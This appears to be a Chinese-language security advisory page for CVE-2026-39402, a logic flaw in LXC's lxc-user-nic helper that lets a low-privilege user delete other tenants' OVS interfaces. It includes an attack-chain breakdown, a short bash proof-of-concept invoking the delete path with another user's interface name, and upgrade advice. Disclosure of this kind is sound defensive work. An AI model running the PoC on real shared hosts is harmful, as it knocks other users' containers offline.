IPBUF安全漏洞报告
English
CVE-2026-39402 CVSS 6.5 中危

CVE-2026-39402 LXC逻辑漏洞导致DoS

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-39402
漏洞类型
逻辑漏洞
CVSS评分
6.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
LXC (Linux Containers)

相关标签

逻辑漏洞拒绝服务LXC权限控制容器安全

漏洞概述

LXC是一个Linux容器运行时。在其setuid辅助程序lxc-user-nic的删除路径中,find_line()函数存在逻辑缺陷。该漏洞允许非特权用户删除属于其他用户的OVS附加网络接口。当lxc-user-nic扫描NIC数据库以授权删除请求时,接口名称的比较逻辑存在漏洞,可仅基于名称匹配设置授权标志,而忽略所有权、类型和链接字段。这导致在多租户环境中,拥有有效策略条目的攻击者可触发删除同一网桥上其他用户的OVS端口,造成拒绝服务。

技术细节

该漏洞位于lxc-user-nic的setuid辅助工具中,具体影响find_line()函数的逻辑流程。在处理删除操作时,代码在`goto next`标签之后执行接口名称比较,而此时之前的所有权检查可能已失败或被跳过。由于后续流程未重新验证匹配的数据库条目是否属于调用者,只要接口名称匹配,授权标志就会被设置。攻击者利用此逻辑绕过,可以在拥有有效lxc-usernet策略条目的前提下,删除共享基础设施上其他租户容器的网络接口,导致网络中断。

攻击链分析

STEP 1
步骤1
攻击者在多租户环境中获得低权限用户访问权限,且该环境使用lxc-user-nic和OpenVSwitch网桥。
STEP 2
步骤2
攻击者识别出连接到共享OVS网桥的、属于其他用户的网络接口名称。
STEP 3
步骤3
攻击者利用lxc-user-nic的delete功能,传入目标接口名称。
STEP 4
步骤4
lxc-user-nic的find_line()函数因逻辑缺陷,仅凭接口名称匹配即授权删除,绕过所有权校验。
STEP 5
步骤5
受害者的网络接口被删除,导致容器网络连接中断,实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-39402: lxc-user-nic Logic Flaw # This script demonstrates how an unprivileged user might trigger the deletion # of another user's OVS interface by exploiting the find_line() logic. # Configuration BRIDGE_NAME="lxcbr0" TARGET_INTERFACE="vethXXXX" # Interface name owned by another user LXC_PATH="/var/lib/lxc" echo "[*] Attempting to delete interface $TARGET_INTERFACE on bridge $BRIDGE_NAME" # The vulnerability is in the 'delete' path of lxc-user-nic. # Due to the logic flaw, if the interface name matches an entry in the database, # ownership checks are bypassed after the 'goto next' label. /usr/libexec/lxc/lxc-user-nic delete \ "$LXC_PATH" \ "$(whoami)" \ "veth" \ "$BRIDGE_NAME" \ "$TARGET_INTERFACE" if [ $? -eq 0 ]; then echo "[+] Potential DoS triggered. Interface $TARGET_INTERFACE deleted." else echo "[-] Operation failed." fi

影响范围

LXC < 7.0.0

防御指南

临时缓解措施
建议立即将LXC升级至7.0.0或更高版本以修复此逻辑漏洞。在无法立即升级的情况下,应严格限制非特权用户对lxc-user-nic工具的执行权限,或在多租户环境中暂时避免使用OpenVSwitch (OVS) 桥接功能,直至补丁应用完毕。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表